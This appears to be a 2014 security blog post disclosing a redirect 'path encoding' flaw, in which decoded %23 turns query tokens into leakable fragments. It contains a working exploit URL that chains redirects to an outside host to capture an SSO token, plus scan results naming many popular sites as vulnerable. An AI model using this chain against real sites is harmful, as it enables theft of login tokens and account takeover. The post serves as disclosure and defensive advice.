MasterPass and PayPal: Path Encoding Vulnerability in https/www redirects.

Playing with 302-based header injection (majority of web servers is not vulnerable to it btw) i found one tricky neat bug which can be really useful to leak ?query data by putting them in the #fragment.

Remark about the difference: fragment might seem to be more secure than query - no, I don't think so. There are just thousands of open-redirects out there leaking access_token-s. I personally found an open redirect leaking user's token on 2 out of 3 huge websites i checked. I only stopped looking for open redirects because I don't exploit and there's no market for "facebook access_tokens" (let's create one?)... whatever

Yes, ?query can be leaked with Referrers but you can easily deny them - you never can't be sure you don't have open redirects.

Tip 1. do not send sensitive info in #fragment because 302 redirect will leak this data.

Problem: many web servers are configured in a way to redirect http://site.com/%23lol to http://www.site.com/#lol - they kill initial encoding, putting query data in location.hash. And this is a vulnerability.

To demonstrate the bug in the wild I created this demo. Hard Mode solution by the way: http://www.sakurity.com/issue_token?hard_mode=1&uri=http://sakurity.com/triple?to=//egorhomakov.com%2523

Any ?private_info can be turned into #private_info and be leaked easily with a 302 redirect.

Chain looks like this
Provider Issues a Token -> Client-WWW-redirector%23?Token -> Client-redirector#?Token -> Evil#?Token.
There were basically only two ways servers could "screw" path encoding: https and www related redirects.

Tip 2. check https->http / www.site->site redirects to find Path Encoding Vulnerability.

Let's check www-redirects against our Lazy list. Here is my lousy script.
For "/?x=%23x" payload almost nobody is vulnerable because encoding request.query seems obvious.

http://www.olx.in/?x=#x

http://www.target.com?&x=#x

http://www.force.com/?x=#x

http://www.retailmenot.com/?x=#x

http://www.chip.de/?x=#x

http://store.steampowered.com/?x=#x

http://www.iminent.com?x=#x

Let's check '/%23x'

http://www.amazon.com/#x
http://www.bing.com/#x
http://www.microsoft.com/#x
http://www.msn.com/#x
http://www.ask.com/#x
http://www.amazon.co.jp/#x
http://stackoverflow.com/#x
http://www.cnn.com/#x
http://imgur.com/#x
http://www.huffingtonpost.com/#x
/Error/NotFound?aspxerrorpath=/#x
http://www.amazon.de/#x
http://www.about.com/#x
http://www.godaddy.com/#x
http://vimeo.com/#x
http://www.dailymail.co.uk/#x
http://www.amazon.co.uk/#x
http://www.aol.com/#x
http://kickass.to/#x/
http://www.globo.com/#x
http://www.aweber.com/#x
http://www.theguardian.com/#x
http://www.salesforce.com/#x
http://www.espncricinfo.com/#x
http://statcounter.com/#x/
http://www.warriorforum.com/#x
http://mashable.com/#x/
http://www.nbcnews.com/#x
http://www.shutterstock.com/#x
http://www.amazon.fr/#x
http://www.samsung.com/#x
http://www.popads.net/#x
http://pick.naver.jp/#x
http://www.usatoday.com/#x
http://stackexchange.com/#x
http://www.in.com/#x
http://bit.ly/a/warning?url=http%3a%2f%2fwww%2evirtual4now%2ecom&hash=#x
http://www.olx.in/#x
http://www.gsmarena.com/#x
http://www.ndtv.com/#x
http://www.ign.com/#x
http://www.varzesh3.com/#x
http://www.linkbucks.com/#x
http://www.webmd.com/#x
http://www.ig.com.br/#x
http://www.bitauto.com/#x/
http://www.hdfcbank.com/#x
http://www.dell.com/#x
http://www.force.com/#x
http://www.speedtest.net/#x
http://www.cbssports.com/#x
http://www.quora.com/#x
http://www.time.com/#x
http://www.amazon.cn/#x
http://www.retailmenot.com/#x
http://www.match.com/#x
http://subscene.com/#x
http://www.amazon.it/#x
http://abcnews.go.com/#x
http://www.timeanddate.com/#x
http://www.engadget.com/#x
http://www.corriere.it/#x
http://chaturbate.com/#x
http://www.swagbucks.com/#x
https://www4.gotomeeting.com/#x?Portal=gotomeeting.com
http://www.lemonde.fr/#x
http://www.chip.de/#x
http://www.hubspot.com/#x
http://www.pconline.com.cn/#x
http://www.marketwatch.com/#x
https://www.namecheap.com/#x
http://adultfriendfinder.com/#x
http://www.majesticseo.com/#x
http://msn.foxsports.com/#x
http://www.eventbrite.com/#x
http://www.virgilio.it/#x
http://www.tradedoubler.com/#x
http://www.autohome.com.cn/#x
http://persianblog.ir/#x
http://allrecipes.com/#x
http://www.lanacion.com.ar/#x
http://www.cbsnews.com/#x
http://www.tomshardware.com/#x
http://www.dict.cc/?s=#x
http://www.amazon.es/#x
http://www.pclady.com.cn/#x
http://vitaminl.tv/#x
http://www.spankwire.com/#x
http://www.ancestry.com/#x
http://ezinearticles.com/#x
http://www.aizhan.com/#x
http://www.rednet.cn/#x
http://www.mynet.com/#x
http://www.theverge.com/#x
http://www.allocine.fr/#x
http://www.pcbaby.com.cn/#x
http://www.chron.com/#x
/404.aspx?aspxerrorpath=/#x
http://myegy.com/#x
....i killed the script , it's only first 500.

Check if your server turns %23 into # and patch it if you don't want your Single Sign On to be hacked.
Be careful with encodings. Many servers are configured in a wrong way + Microsoft IIS is vulnerable by default.

MasterPass and PayPal

2 Jan 2014

Path Encoding Vulnerability in https/www redirects.

Popular Posts